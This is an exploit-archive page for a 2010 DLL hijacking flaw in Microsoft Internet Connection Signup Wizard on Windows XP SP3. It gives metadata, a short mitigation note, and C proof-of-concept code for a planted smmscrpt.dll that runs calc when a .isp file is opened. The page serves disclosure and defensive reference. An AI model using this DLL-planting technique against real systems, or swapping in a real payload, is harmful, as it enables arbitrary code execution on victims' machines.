header-logo
Suggest Exploit
vendor:
Internet Connection Signup Wizard
by:
Beenu Arora
7.5
CVSS
HIGH
DLL Hijacking
CWE
Product Name: Internet Connection Signup Wizard
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

Microsoft Internet Connection Signup Wizard DLL Hijacking

This exploit allows an attacker to hijack the Microsoft Internet Connection Signup Wizard DLL and execute arbitrary code. By compiling and renaming the provided code as smmscrpt.dll and creating a file with one of the vulnerable extensions (.isp) in the same directory, the attacker can trigger the execution of the 'evil' function, which opens the Windows calculator (calc).

Mitigation:

To mitigate this vulnerability, users should ensure that they have applied the latest security updates from Microsoft. Additionally, users should exercise caution when opening files from untrusted sources.
Source

Exploit-DB raw data:

# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora
# Site : www.BeenuArora.com

/* 
Exploit Title: Microsoft Internet Connection Signup Wizard DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 
Vulnerable extensions: .isp

Compile and rename to smmscrpt.dll, create a file in the same dir with one of the following extensions:
.isp


#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR